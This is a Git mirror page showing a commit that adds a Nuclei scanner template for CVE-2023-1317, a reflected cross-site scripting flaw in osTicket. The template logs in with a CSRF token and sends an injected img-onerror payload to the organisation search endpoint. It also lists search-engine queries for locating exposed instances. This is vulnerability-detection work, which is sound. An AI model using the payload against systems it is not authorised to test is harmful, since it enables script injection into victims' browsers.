daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #10981 from projectdiscovery/CVE-2023-1317 

Create CVE-2023-1317.yaml
patch-12
Dhiyaneshwaran 2024-10-15 14:33:30 +05:30 committed by GitHub
parent 8e5c464d4d ed8d2fb0a5
commit 520bebdfef
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 74 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

74
http/cves/2023/CVE-2023-1317.yaml Normal file
View File

@ -0,0 +1,74 @@
id: CVE-2023-1317
info:
name: osTicket < v1.16.6 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Cross-site Scripting (XSS) - Reflected in GitHub repository osticket/osticket prior to v1.16.6.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
remediation: |
Upgrade osTicket to later version to mitigate this vulnerability.
reference:
- https://huntr.com/bounties/c3e27af2-358b-490b-9baf-e451663e4e5f
- https://nvd.nist.gov/vuln/detail/CVE-2023-1317
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2023-1317
cwe-id: CWE-79
epss-score: 0.00058
epss-percentile: 0.25661
cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: osticket
product: osticket
shodan-query: title:"osTicket"
fofa-query: title="osticket"
google-query: intitle:"osticket"
tags: cve,cve2023,osticket,xss,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET /scp/login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "osticket")'
internal: true
extractors:
- type: regex
name: csrftoken
part: body
group: 1
regex:
- '__CSRFToken__" value="(.*?)"'
internal: true
- raw:
- |
POST /scp/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1
- |
GET /scp/ajax.php/orgs/search?q=osTicket%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "<img src=a onerror=alert(document.domain)>")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and